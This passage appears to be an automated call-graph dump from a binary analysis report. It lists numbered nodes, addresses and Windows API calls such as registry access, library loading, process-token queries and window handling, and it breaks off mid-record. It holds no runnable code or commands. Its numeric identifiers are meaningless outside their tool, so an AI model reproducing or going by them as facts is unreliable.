50471->50557 50473 1113c5ad 50473->50469 50475->49474 50477 1107d14c 50476->50477 50479 1107d151 __mbschr_l 50476->50479 50558 1107d060 IsDBCSLeadByte 50477->50558 50479->49471 50481->49497 50482->49501 50483->49503 50512 111598eb 50486->50512 50488 110258a0 50489 110258c8 50488->50489 50490 110258ad GetDriveTypeA 50488->50490 50489->50449 50490->50489 
50492 1102938a 50491->50492 50518 110c9870 50492->50518 50494 1102939a 50495 110c9920 7 API calls 50494->50495 50500 110293c1 50495->50500 50496 11029453 50498 1102946f 50496->50498 50505 11029483 50496->50505 50537 11027f50 6 API calls 50498->50537 50500->50496 50502 1107d280 15 API calls 50500->50502 50530 1107d330 50500->50530 50501 11029547 50504 11029563 50501->50504 50511 11029577 50501->50511 50502->50500 50503 1107d330 15 API calls 50503->50505 50538 11027f50 6 API calls 50504->50538 50505->50501 50505->50503 50507 110c9920 7 API calls 50508 11029610 50507->50508 50509 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50508->50509 50510 11029627 50509->50510 50510->50467 50511->50507 50513 1115990d 50512->50513 50514 111598f9 50512->50514 50517 11159895 _LocaleUpdate::_LocaleUpdate __isctype_l 50513->50517 50514->50488 50516 11159917 50516->50488 50517->50516 50519 110c9889 __strdup 50518->50519 50520 110c9884 50518->50520 50521 110c98a0 50519->50521 50520->50519 50522 110c95f0 6 API calls 50521->50522 50523 110c98b3 50522->50523 50539 110c9010 50523->50539 50526 110c98dc 50526->50494 50527 110c98c5 50551 11027f50 6 API calls 50527->50551 50531 1107d342 50530->50531 50532 1107d33d 50530->50532 50536 1107d363 50531->50536 50556 11159e45 14 API calls 2 library calls 50531->50556 50555 1107d060 IsDBCSLeadByte 50532->50555 50535 1107d35c 50535->50500 50536->50500 50540 110c901d 50539->50540 50541 110c9038 50540->50541 50542 110c9021 50540->50542 50544 110c9035 50541->50544 50545 110c9056 50541->50545 50552 11027f50 6 API calls 50542->50552 50544->50541 50553 11027f50 6 API calls 50544->50553 50547 110c9053 50545->50547 50550 110c9079 50545->50550 50547->50545 50554 11027f50 6 API calls 50547->50554 50550->50526 50550->50527 50555->50531 50556->50535 50557->50473 50558->50479 50560 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50559->50560 50561 1113a818 50560->50561 50561->49516 50563 1113939a 50562->50563 50563->49552 
50564->49556 50565->49556 50577->49615 50578->49624 50582 110715d6 50581->50582 50584 110715ed 50581->50584 50621 11027f50 6 API calls 50582->50621 50584->50584 50585 110715ea 50584->50585 50588 11071635 50584->50588 50585->50584 50622 11027f50 6 API calls 50585->50622 50595 1105f940 GetVersionExA 50588->50595 50596 1105f981 RegOpenKeyExA 50595->50596 50971->49906 50972->49910 50973->49930 50974->49917 50976->49938 50978 11027113 50977->50978 50979 1102775b 50977->50979 50980 110271d0 GetModuleFileNameA _strrchr 50978->50980 50989 11027148 50978->50989 50982 110277f7 50979->50982 50983 1102780a 50979->50983 50981 111592b7 92 API calls 50980->50981 50988 110271cb 50981->50988 50985 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50982->50985 50984 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 50983->50984 50986 1102781b 50984->50986 50987 11027806 50985->50987 50986->49953 50987->49953 50988->50979 51004 110255e0 35 API calls 2 library calls 50988->51004 50989->50989 50991 111592b7 92 API calls 50989->50991 50991->50988 50993 11027244 51000 110276c5 50993->51000 51005 11025450 15 API calls 2 library calls 50993->51005 50995 11027280 51006 110255e0 35 API calls 2 library calls 50995->51006 50997 11027290 50997->51000 51007 110255e0 35 API calls 2 library calls 50997->51007 51000->51000 51010 11159081 16 API calls 2 library calls 51000->51010 51002 11159d1c 14 API calls _LanguageEnumProc@4 51003 110272b3 __mbschr_l 51002->51003 51003->51000 51003->51002 51008 11025450 15 API calls 2 library calls 51003->51008 51009 110255e0 35 API calls 2 library calls 51003->51009 51004->50993 51005->50995 51006->50997 51007->51003 51008->51003 51009->51003 51010->50979 51011 1113a570 51012 1113a581 51011->51012 51020 11139f90 51012->51020 51016 1113a5cb 51017 1113a5d2 ResetEvent 51016->51017 51018 1113a5e6 SetEvent WaitForMultipleObjects 51016->51018 51017->51016 51018->51017 51019 1113a604 51018->51019 51021 11139fbf 51020->51021 51022 11139f9c 
GetCurrentProcess 51020->51022 51024 111077a0 std::locale::facet::_Facet_Register 22 API calls 51021->51024 51027 11139fe9 WaitForMultipleObjects 51021->51027 51022->51021 51023 11139fad GetModuleFileNameA 51022->51023 51023->51021 51025 11139fdb 51024->51025 51025->51027 51028 111398e0 GetModuleFileNameA 51025->51028 51027->51016 51027->51019 51029 11139923 51028->51029 51031 11139963 51028->51031 51030 1107d210 2 API calls 51029->51030 51032 11139931 51030->51032 51033 11139989 GetModuleHandleA GetProcAddress 51031->51033 51034 1113996f LoadLibraryA 51031->51034 51032->51031 51037 11139938 LoadLibraryA 51032->51037 51035 111399b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 51033->51035 51036 111399a9 51033->51036 51034->51033 51038 1113997e LoadLibraryA 51034->51038 51039 111399e3 10 API calls 51035->51039 51036->51039 51037->51031 51038->51033 51040 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51039->51040 51041 11139a60 51040->51041 51041->51027 51042 1103f880 51043 1103f8a3 51042->51043 51044 1103f88a 51042->51044 51045 1103f8da 51043->51045 51047 1103f8b0 51043->51047 51046 1103f700 146 API calls 51045->51046 51048 1103f8c4 51046->51048 51047->51048 51050 1103f700 51047->51050 51051 1103f732 51050->51051 51052 1103f738 51051->51052 51059 1103f754 51051->51059 51053 110f3800 6 API calls 51052->51053 51055 1103f74a CloseHandle 51053->51055 51054 1103f868 51056 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51054->51056 51055->51059 51058 1103f875 51056->51058 51057 1103f7e8 51072 110f3800 GetTokenInformation 51057->51072 51058->51048 51059->51054 51062 1103f78d 51059->51062 51080 11083620 143 API calls 3 library calls 51059->51080 51062->51054 51062->51057 51063 1103f7fa 51064 1103f802 CloseHandle 51063->51064 51068 1103f809 51063->51068 51064->51068 51065 1103f84b 51066 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51065->51066 51070 1103f864 51066->51070 51067 1103f831 51069 11157561 
__ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51067->51069 51068->51065 51068->51067 51071 1103f847 51069->51071 51070->51048 51071->51048 51073 110f3837 51072->51073 51076 110f3848 51072->51076 51074 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51073->51074 51075 110f3844 51074->51075 51075->51063 51076->51073 51077 110f3874 51076->51077 51078 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51077->51078 51079 110f389a 51078->51079 51079->51063 51080->51062 51081 1102ee87 51082 1102ee9a 51081->51082 51083 1102eebe RegOpenKeyExA 51082->51083 51090 1102ef73 51082->51090 51142 1102f4f5 51082->51142 51084 1102eee6 51083->51084 51083->51090 51088 11139370 RegQueryValueExA 51084->51088 51085 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51089 1102f666 51085->51089 51086 1102ef97 51092 111077a0 std::locale::facet::_Facet_Register 22 API calls 51086->51092 51102 1102efd5 GetStockObject GetObjectA 51086->51102 51087 1102f077 51091 111077a0 std::locale::facet::_Facet_Register 22 API calls 51087->51091 51100 1102ef0e 51088->51100 51090->51086 51094 1102efe9 GetModuleHandleA GetProcAddress 51090->51094 51106 1102f013 51090->51106 51093 1102f07e 51091->51093 51096 1102efb9 51092->51096 51093->51102 51244 110f31f0 25 API calls std::locale::facet::_Facet_Register 51093->51244 51097 1102f006 GetNativeSystemInfo 51094->51097 51094->51106 51095 1102ef66 RegCloseKey 51095->51090 51145 11101110 51096->51145 51097->51106 51100->51095 51242 11159a6a _LocaleUpdate::_LocaleUpdate __isctype_l __isdigit_l 51100->51242 51104 1102f207 SetErrorMode SetErrorMode 51102->51104 51108 111077a0 std::locale::facet::_Facet_Register 22 API calls 51104->51108 51106->51086 51106->51087 51107 1102ef2d 51110 1102ef46 51107->51110 51243 11159a6a _LocaleUpdate::_LocaleUpdate __isctype_l __isdigit_l 51107->51243 51111 1102f243 51108->51111 51110->51095 51112 111077a0 std::locale::facet::_Facet_Register 22 API calls 51111->51112 51113 1102f283 
51112->51113 51114 1102f2a1 InterlockedExchange 51113->51114 51115 111077a0 std::locale::facet::_Facet_Register 22 API calls 51114->51115 51116 1102f2c5 51115->51116 51190 11085e20 51116->51190 51118 1102f2dd GetACP _sprintf 51201 1115ac63 51118->51201 51121 1102f30e 51122 111077a0 std::locale::facet::_Facet_Register 22 API calls 51121->51122 51123 1102f354 51122->51123 51124 1105d0a0 22 API calls 51123->51124 51125 1102f37f 51124->51125 51126 111077a0 std::locale::facet::_Facet_Register 22 API calls 51125->51126 51128 1102f3a6 51125->51128 51126->51128 51127 111077a0 std::locale::facet::_Facet_Register 22 API calls 51129 1102f3f4 51127->51129 51128->51127 51226 1111d1b0 51129->51226 51131 1102f416 51132 1102f447 51131->51132 51133 1102f4ce 51131->51133 51134 111077a0 std::locale::facet::_Facet_Register 22 API calls 51132->51134 51138 1102f4cc 51133->51138 51245 1111d2a0 35 API calls 51133->51245 51140 1102f44e 51134->51140 51137 1102f4e7 51137->51142 51238 1100d1e0 51137->51238 51233 1100d4c0 51138->51233 51141 111077a0 std::locale::facet::_Facet_Register 22 API calls 51140->51141 51143 1102f47d 51141->51143 51142->51085 51144 11025f00 16 API calls 51143->51144 51144->51138 51146 111077a0 std::locale::facet::_Facet_Register 22 API calls 51145->51146 51147 11101171 51146->51147 51148 11101182 51147->51148 51149 1110118d 51147->51149 51252 110ff670 28 API calls 3 library calls 51148->51252 51151 1110118f OpenEventA 51149->51151 51152 111012b1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 51151->51152 51153 111011f8 CloseHandle GetSystemDirectoryA 51151->51153 51156 111077a0 std::locale::facet::_Facet_Register 22 API calls 51152->51156 51155 11101218 51153->51155 51154 11101189 51154->51151 51155->51155 51157 11101220 LoadLibraryA 51155->51157 51158 11101303 51156->51158 51157->51152 51159 11101251 51157->51159 51160 1110131c 51158->51160 51253 110ed560 9 API calls std::locale::facet::_Facet_Register 51158->51253 51161 1113b380 21 API 
calls 51159->51161 51163 11107630 178 API calls 51160->51163 51164 1110125b 51161->51164 51165 11101338 CloseHandle 51163->51165 51166 11101262 GetProcAddress 51164->51166 51167 1110127a GetProcAddress 51164->51167 51246 110996c0 51165->51246 51166->51167 51169 111012a4 FreeLibrary 51167->51169 51170 11101296 51167->51170 51169->51152 51170->51152 51172 111013e5 51174 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51172->51174 51173 111077a0 std::locale::facet::_Facet_Register 22 API calls 51175 11101353 51173->51175 51176 111013ff 51174->51176 51177 11101364 51175->51177 51178 1110136d 51175->51178 51176->51102 51254 110ed560 9 API calls std::locale::facet::_Facet_Register 51177->51254 51180 11107630 178 API calls 51178->51180 51181 11101389 CloseHandle 51180->51181 51182 1113b380 21 API calls 51181->51182 51183 1110139a 51182->51183 51183->51172 51184 111077a0 std::locale::facet::_Facet_Register 22 API calls 51183->51184 51185 111013a8 51184->51185 51186 111013c2 51185->51186 51255 110ed560 9 API calls std::locale::facet::_Facet_Register 51185->51255 51188 11107630 178 API calls 51186->51188 51189 111013de CloseHandle 51188->51189 51189->51172 51191 111077a0 std::locale::facet::_Facet_Register 22 API calls 51190->51191 51192 11085e57 51191->51192 51194 111077a0 std::locale::facet::_Facet_Register 22 API calls 51192->51194 51197 11085e79 InitializeCriticalSection 51192->51197 51196 11085e72 51194->51196 51195 11085eda 51195->51118 51196->51197 51269 111579fa 15 API calls std::exception::_Copy_str 51196->51269 51197->51195 51199 11085ea9 51270 11157e51 RaiseException 51199->51270 51202 1115ac6f 51201->51202 51203 1115ac90 __getptd 51202->51203 51204 1115ac79 51202->51204 51271 11165c68 51203->51271 51305 111636c4 11 API calls _strcpy_s 51204->51305 51206 1115ac9f 51281 1115f57e 51206->51281 51210 1115acc4 __lock __copytlocinfo_nolock 51211 1115ace2 51210->51211 51287 1115aa47 51211->51287 51214 1115adac 51309 11165a37 8 API calls 51214->51309 51215 
1115acfb 51216 1115ad1a __lock 51215->51216 51306 11165c1b 31 API calls 3 library calls 51216->51306 51218 1115adb2 51310 11165ad0 15 API calls 51218->51310 51221 1115ad33 51307 11165a37 8 API calls 51221->51307 51223 1115ad39 51225 1115ac89 51223->51225 51308 11165c1b 31 API calls 3 library calls 51223->51308 51225->51121 51227 111077a0 std::locale::facet::_Facet_Register 22 API calls 51226->51227 51228 1111d1e4 51227->51228 51229 1111d1fa 51228->51229 51232 1111d215 51228->51232 51359 11071ba0 191 API calls std::locale::facet::_Facet_Register 51229->51359 51231 1111d20a 51231->51232 51232->51131 51234 1100d4d2 51233->51234 51235 1100d4cb 51233->51235 51236 1100d4db FreeLibrary 51234->51236 51237 1100d51e 51234->51237 51235->51137 51236->51237 51237->51137 51239 1100d246 wsprintfA 51238->51239 51240 1100d1eb 51238->51240 51239->51142 51240->51239 51241 1100d1f2 51240->51241 51241->51142 51242->51107 51243->51107 51244->51102 51245->51138 51247 110996cf GetCurrentProcess OpenProcessToken 51246->51247 51248 1109970d 51246->51248 51247->51248 51249 110996f2 51247->51249 51248->51172 51248->51173 51256 110995f0 51249->51256 51251 110996fb CloseHandle 51251->51248 51252->51154 51253->51160 51254->51178 51255->51186 51257 11099610 GetTokenInformation 51256->51257 51262 110996a6 51256->51262 51259 11099632 __crtGetStringTypeA_stat 51257->51259 51258 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51260 110996b8 51258->51260 51261 11099638 GetTokenInformation 51259->51261 51259->51262 51260->51251 51261->51262 51263 1109964a 51261->51263 51262->51258 51264 1109967f EqualSid 51263->51264 51265 11099653 AllocateAndInitializeSid 51263->51265 51264->51262 51266 1109968d 51264->51266 51265->51262 51265->51264 51267 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51266->51267 51268 110996a2 51267->51268 51268->51251 51269->51199 51270->51197 51272 111647d0 51271->51272 51273 11165c74 __getptd 51272->51273 51274 11165ca7 __lock 51273->51274 51275 
11165c85 51273->51275 51311 11165c1b 31 API calls 3 library calls 51274->51311 51275->51274 51277 11165c8b __getptd 51275->51277 51278 11165c93 ___pctype_func 51277->51278 51279 11165c97 __amsg_exit 51278->51279 51280 11165c9f 51278->51280 51279->51280 51280->51206 51284 1115f587 51281->51284 51283 1115acb5 51283->51210 51283->51225 51284->51283 51285 1115f5a5 Sleep 51284->51285 51312 11165926 51284->51312 51286 1115f5ba 51285->51286 51286->51283 51286->51284 51288 1115aa70 51287->51288 51294 1115aa8b 51287->51294 51290 1115aa7a 51288->51290 51292 1115a70d __setlocale_set_cat 32 API calls 51288->51292 51289 1115ac4f __setlocale_get_all 51289->51290 51293 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51290->51293 51291 1115abdc __expandlocale 51291->51290 51297 1115abf8 51291->51297 51292->51290 51295 1115ac61 51293->51295 51294->51289 51294->51291 51299 1115aac0 _strpbrk _strlen 51294->51299 51295->51214 51295->51215 51301 1115abb5 51297->51301 51316 1115a70d __getptd __expandlocale 51297->51316 51298 1115ab07 _strncmp 51298->51299 51299->51290 51299->51298 51300 1115ab38 _strcspn 51299->51300 51299->51301 51302 1115abce 51299->51302 51304 1115a70d __setlocale_set_cat 32 API calls 51299->51304 51300->51299 51301->51289 51301->51290 51303 11163672 __invoke_watson 10 API calls 51302->51303 51303->51290 51304->51299 51305->51225 51306->51221 51307->51223 51308->51225 51309->51218 51310->51225 51311->51278 51314 11165932 51312->51314 51313 1116593e 51313->51284 51314->51313 51315 11165960 RtlAllocateHeap 51314->51315 51315->51313 51315->51314 51317 1115a769 51316->51317 51319 1115a779 _strlen 51316->51319 51318 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51317->51318 51320 1115a777 51318->51320 51319->51317 51321 1115f539 __malloc_crt 16 API calls 51319->51321 51320->51297 51322 1115a7b3 _memmove 51321->51322 51322->51317 51353 1116165f 51322->51353 51324 1115aa1b 51325 11163672 __invoke_watson 10 API calls 51324->51325 51326 
1115aa46 51325->51326 51327 1115aa70 51326->51327 51336 1115aa8b 51326->51336 51330 1115aa7a 51327->51330 51332 1115a70d __setlocale_set_cat 21 API calls 51327->51332 51328 1115a826 _memmove 51328->51324 51342 1115a96d 51328->51342 51357 1116962e 20 API calls __crtGetStringTypeA_stat 51328->51357 51329 1115ac4f __setlocale_get_all 51329->51330 51335 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51330->51335 51331 1115abdc __expandlocale 51331->51330 51345 1115abf8 51331->51345 51332->51330 51333 1115a9e1 51333->51324 51338 1115a9ed InterlockedDecrement 51333->51338 51334 1115a9b0 _free 51334->51317 51337 1115ac61 51335->51337 51336->51329 51336->51331 51347 1115aac0 _strpbrk _strlen 51336->51347 51337->51297 51338->51324 51340 1115aa05 _free _free 51338->51340 51340->51324 51341 1115a92a 51341->51342 51343 1115a946 _memcmp 51341->51343 51342->51333 51342->51334 51343->51342 51344 1115a70d __setlocale_set_cat 21 API calls 51344->51345 51345->51344 51349 1115abb5 51345->51349 51346 1115ab07 _strncmp 51346->51347 51347->51330 51347->51346 51348 1115ab38 _strcspn 51347->51348 51347->51349 51350 1115abce 51347->51350 51352 1115a70d __setlocale_set_cat 21 API calls 51347->51352 51348->51347 51349->51329 51349->51330 51351 11163672 __invoke_watson 10 API calls 51350->51351 51351->51330 51352->51347 51354 1116166d 51353->51354 51356 11161683 51354->51356 51358 111636c4 11 API calls _strcpy_s 51354->51358 51356->51328 51357->51341 51358->51356 51359->51231 51360 1106d800 51361 1106d921 51360->51361 51388 1106d845 51360->51388 51362 1106db47 51361->51362 51363 1106dbe2 51361->51363 51364 1106db63 51361->51364 51365 1106dc40 51361->51365 51366 1106dcce 51361->51366 51367 1106db2d 51361->51367 51368 1106dbca 51361->51368 51369 1106da48 51361->51369 51370 1106dcb2 51361->51370 51371 1106dcbe 51361->51371 51384 1106d93d 51361->51384 51392 1106d855 51361->51392 51404 1106b9d0 35 API calls 2 library calls 51362->51404 51382 111077a0 
std::locale::facet::_Facet_Register 22 API calls 51363->51382 51363->51392 51372 111583b1 _malloc 15 API calls 51364->51372 51380 111077a0 std::locale::facet::_Facet_Register 22 API calls 51365->51380 51365->51392 51412 110634b0 SetEvent 51366->51412 51377 11059e50 6 API calls 51367->51377 51405 11027f50 6 API calls 51368->51405 51369->51392 51403 11085330 EnterCriticalSection LeaveCriticalSection 51369->51403 51410 11063480 SetEvent 51370->51410 51411 11063550 SetEvent 51371->51411 51372->51392 51377->51392 51379 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51383 1106dd06 51379->51383 51386 1106dc50 51380->51386 51381 1106db4f 51381->51392 51385 1106dbf2 51382->51385 51389 1106d9b9 51384->51389 51384->51392 51393 1106d9db 51384->51393 51397 1106dc10 51385->51397 51406 1106d5e0 24 API calls 51385->51406 51395 1106dc70 51386->51395 51408 1106d6c0 23 API calls 51386->51408 51388->51392 51394 1106d8d8 wsprintfA 51388->51394 51401 1105f740 24 API calls std::locale::facet::_Facet_Register 51389->51401 51392->51379 51393->51392 51402 1105f740 24 API calls std::locale::facet::_Facet_Register 51393->51402 51394->51388 51409 111075f0 InterlockedDecrement 51395->51409 51407 111075f0 InterlockedDecrement 51397->51407 51401->51392 51402->51392 51403->51392 51404->51381 51406->51397 51407->51392 51408->51395 51409->51392 51410->51392 51411->51392 51412->51392 51413 10705cdd 51414 10705cf0 51413->51414 51418 10705cf9 51413->51418 51422 10705d21 51414->51422 51452 10702c20 DisableThreadLibraryCalls 51414->51452 51417 10705d2d 51419 10705d41 51417->51419 51420 10705c04 105 API calls 51417->51420 51417->51422 51418->51414 51418->51422 51423 10705c04 51418->51423 51421 10705c04 105 API calls 51419->51421 51419->51422 51420->51419 51421->51422 51424 10705c11 GetVersion 51423->51424 51425 10705c99 51423->51425 51453 10705f67 HeapCreate 51424->51453 51427 10705ccb 51425->51427 51428 10705c9f 51425->51428 51429 10705c64 51427->51429 51475 1070875c 31 API calls 
___free_lc_time 51427->51475 51428->51429 51432 10705cba 51428->51432 51471 10709333 32 API calls 51428->51471 51429->51414 51430 10705c23 51430->51429 51465 10708670 37 API calls 51430->51465 51472 107095de 30 API calls ___free_lc_time 51432->51472 51436 10705cbf 51473 107086c4 35 API calls 51436->51473 51437 10705c5b 51439 10705c68 GetCommandLineA 51437->51439 51440 10705c5f 51437->51440 51467 10709938 37 API calls 2 library calls 51439->51467 51466 10705fc4 6 API calls 51440->51466 51442 10705cc4 51474 10705fc4 6 API calls 51442->51474 51444 10705c78 51468 10709422 34 API calls ___free_lc_time 51444->51468 51447 10705c82 51469 107096eb 49 API calls ___free_lc_time 51447->51469 51449 10705c87 51470 10709632 48 API calls 2 library calls 51449->51470 51451 10705c8c 51451->51429 51452->51417 51454 10705f87 51453->51454 51455 10705fbd 51453->51455 51476 10705e1f 57 API calls _wctomb_s 51454->51476 51455->51430 51457 10705f8c 51458 10705fa3 51457->51458 51459 10705f96 51457->51459 51461 10705fc0 51458->51461 51478 107070a7 5 API calls ___free_lc_time 51458->51478 51477 1070613e HeapAlloc 51459->51477 51461->51430 51462 10705fa0 51462->51461 51464 10705fb1 HeapDestroy 51462->51464 51464->51455 51465->51437 51466->51429 51467->51444 51468->51447 51469->51449 51470->51451 51471->51432 51472->51436 51473->51442 51474->51429 51475->51429 51476->51457 51477->51462 51478->51462 51479 1000d010 51480 1000d034 51479->51480 51481 1000d538 51479->51481 51564 10273a9d 51480->51564 51485 1000d08f 51486 1000ce70 12 API calls 51485->51486 51487 1000d0a3 51486->51487 51488 1000ce70 12 API calls 51487->51488 51489 1000d0b7 51488->51489 51490 1000ce70 12 API calls 51489->51490 51491 1000d0cb 51490->51491 51492 1000ce70 12 API calls 51491->51492 51493 1000d0df 51492->51493 51494 1000ce70 12 API calls 51493->51494 51495 1000d0f3 51494->51495 51496 1000ce70 12 API calls 51495->51496 51497 1000d107 51496->51497 51498 1000ce70 12 API calls 51497->51498 51499 1000d127 51498->51499 51500 
1000ce70 12 API calls 51499->51500 51501 1000d147 51500->51501 51502 1000ce70 12 API calls 51501->51502 51503 1000d15b 51502->51503 51504 1000ce70 12 API calls 51503->51504 51505 1000d16f 51504->51505 51506 1000ce70 12 API calls 51505->51506 51507 1000d18f 51506->51507 51508 1000ce70 12 API calls 51507->51508 51509 1000d1af 51508->51509 51510 1000ce70 12 API calls 51509->51510 51511 1000d1c3 51510->51511 51512 1000ce70 12 API calls 51511->51512 51513 1000d1e3 51512->51513 51514 1000ce70 12 API calls 51513->51514 51515 1000d203 51514->51515 51516 1000ce70 12 API calls 51515->51516 51517 1000d217 51516->51517 51518 1000ce70 12 API calls 51517->51518 51519 1000d22b 51518->51519 51520 1000ce70 12 API calls 51519->51520 51521 1000d23f 51520->51521 51522 1000ce70 12 API calls 51521->51522 51523 1000d253 51522->51523 51524 1000ce70 12 API calls 51523->51524 51525 1000d267 51524->51525 51526 1000ce70 12 API calls 51525->51526 51527 1000d27b 51526->51527 51528 1000ce70 12 API calls 51527->51528 51529 1000d28f 51528->51529 51530 1000ce70 12 API calls 51529->51530 51531 1000d2a3 51530->51531 51532 1000ce70 12 API calls 51531->51532 51533 1000d2b7 51532->51533 51534 1000ce70 12 API calls 51533->51534 51535 1000d2cb 51534->51535 51536 1000ce70 12 API calls 51535->51536 51537 1000d2df 51536->51537 51538 1000ce70 12 API calls 51537->51538 51539 1000d2f3 51538->51539 51540 1000ce70 12 API calls 51539->51540 51541 1000d307 51540->51541 51542 1000ce70 12 API calls 51541->51542 51543 1000d31b 51542->51543 51544 1000ce70 12 API calls 51543->51544 51545 1000d32f 51544->51545 51546 1000ce70 12 API calls 51545->51546 51547 1000d343 51546->51547 51548 1000ce70 12 API calls 51547->51548 51549 1000d357 51548->51549 51550 1000ce70 12 API calls 51549->51550 51551 1000d36b 51550->51551 51552 1000ce70 12 API calls 51551->51552 51553 1000d37f 51552->51553 51554 1000ce70 12 API calls 51553->51554 51555 1000d393 51554->51555 51556 1000ce70 12 API calls 51555->51556 51557 1000d3a7 51556->51557 
51557->51481 51558 1000d3b1 GetCurrentDirectoryW 51557->51558 51559 1000d416 51558->51559 51559->51559 51560 1000d523 51559->51560 51563 1000d49d _strncat 51559->51563 51560->51481 51561 1000d52a SetCurrentDirectoryW 51560->51561 51561->51481 51562 1000d4b4 LoadLibraryA 51562->51563 51563->51559 51563->51562 51579 10273a6d 51564->51579 51567 1000ce70 51568 10273a9d 8 API calls 51567->51568 51569 1000ce88 51568->51569 51570 10273a9d 8 API calls 51569->51570 51571 1000ce96 51570->51571 51573 1000cf93 51571->51573 51574 1000ceab 51571->51574 51572 1000cfa7 FreeImage_OutputMessageProc 51572->51485 51573->51572 51575 1000cf66 51574->51575 51591 1000e690 8 API calls 51574->51591 51575->51485 51577 1000cf54 51592 1000e6b0 InitializeCriticalSectionAndSpinCount RaiseException RtlFreeHeap GetLastError 51577->51592 51580 10273a72 51579->51580 51581 1000d045 51580->51581 51583 10273a8e 51580->51583 51588 1028e7b5 7 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 51580->51588 51581->51481 51581->51567 51584 10274fb9 51583->51584 51589 1027832b RaiseException 51583->51589 51590 1027832b RaiseException 51584->51590 51587 10274fd6 51588->51580 51589->51584 51590->51587 51591->51577 51592->51575 51593 1110df20 51594 1113b570 21 API calls 51593->51594 51595 1110df3e 51594->51595 51596 1110df65 51595->51596 51597 1110df48 51595->51597 51600 1113b380 21 API calls 51595->51600 51596->51597 51598 1110df74 CoInitialize CoCreateInstance 51596->51598 51599 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51597->51599 51601 1110dfa4 LoadLibraryA 51598->51601 51610 1110df99 51598->51610 51602 1110df56 51599->51602 51600->51596 51603 1110dfc0 GetProcAddress 51601->51603 51601->51610 51604 1110dfd0 SHGetSettings 51603->51604 51605 1110dfe4 FreeLibrary 51603->51605 51604->51605 51605->51610 51606 1110e081 CoUninitialize 51607 1110e087 51606->51607 51608 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51607->51608 51609 1110e096 51608->51609 
51610->51606 51610->51607 51611 10001bf0 51612 10001dfd 51611->51612 51613 10001c17 51611->51613 51614 10001df2 51613->51614 51622 10001c31 51613->51622 51627 1027c531 51613->51627 51615 1027c531 ___vcrt_freefls@4 2 API calls 51614->51615 51615->51612 51617 10001d7c 51619 10001dd8 _FreeImage_Unload 51617->51619 51623 1027c466 51619->51623 51621 1027c531 RtlFreeHeap GetLastError ___vcrt_freefls@4 51621->51622 51622->51617 51622->51621 51630 100045d0 11 API calls 51622->51630 51624 1027c46b 51623->51624 51625 1027c482 51624->51625 51626 1027c531 ___vcrt_freefls@4 2 API calls 51624->51626 51625->51614 51626->51625 51631 1029012c 51627->51631 51629 1027c549 51629->51622 51630->51622 51632 10290160 _free 51631->51632 51633 10290137 RtlFreeHeap 51631->51633 51632->51629 51633->51632 51634 1029014c 51633->51634 51635 10290152 GetLastError 51634->51635 51635->51632 51636 11133920 51637 11133929 51636->51637 51638 1113392e 51636->51638 51640 11130aa0 51637->51640 51641 11130ad7 51640->51641 51642 11130adc 51640->51642 51848 11027e30 10 API calls 51641->51848 51736 1112baf0 51642->51736 51648 11130bcd 51652 11130bfe FindWindowA 51648->51652 51657 11130c96 51648->51657 51650 11157561 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 51653 1113101e 51650->51653 51651 11130b18 IsWindow IsWindowVisible 51654 11130b43 51651->51654 51655 11130c13 IsWindowVisible 51652->51655 51652->51657 51653->51638 51659 11059e50 6 API calls 51654->51659 51656 11130c1a 51655->51656 51655->51657 51656->51657 51664 11130640 179 API calls 51656->51664 51660 11059e50 6 API calls 51657->51660 51665 11130cbb 51657->51665 51658 11130e6b 51663 11130e85 51658->51663 51668 11130640 179 API calls 51658->51668 51662 11130b5f IsWindowVisible 51659->51662 51678 11130ce3 51660->51678 51661 11059e50 6 API calls 51666 11130e58 51661->51666 51662->51648 51667 11130b6d 51662->51667 51670 11130ea2 51663->51670 51918 110678a0 61 API calls 51663->51918 51669 11130c3b IsWindowVisible 51664->51669 51665->51658 
51665->51661 51666->51658 51672 11130e5d 51666->51672 51667->51648 51673 11130b75 51667->51673 51668->51663 51669->51657 51674 11130c4a IsIconic 51669->51674 51680 11130eb8 51670->51680 51681 11130eaf 51670->51681 51917 1102b940 137 API calls 51672->51917 51683 11130b7f GetForegroundWindow 51673->51683 51674->51657 51675 11130c5b GetForegroundWindow 51674->51675 51915 11129200 ShowWindow 51675->51915 51678->51665 51679 11130d30 51678->51679 51685 1107d140 IsDBCSLeadByte 51678->51685 51687 111395a0 8 API calls 51679->51687 51688 11130ec2 51680->51688 51689 11130ece 51680->51689 51919 11129a80 18 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 51681->51919 51682 11130e66 51682->51658 51690 11130bba 51683->51690 51691 11130b8e EnableWindow 51683->51691 51684 11130c6a 51916 11129200 ShowWindow 51684->51916 51685->51679 51694 11130d42 51687->51694 51700 11130ecc 51688->51700 51920 11129820 62 API calls 51688->51920 51921 11129750 63 API 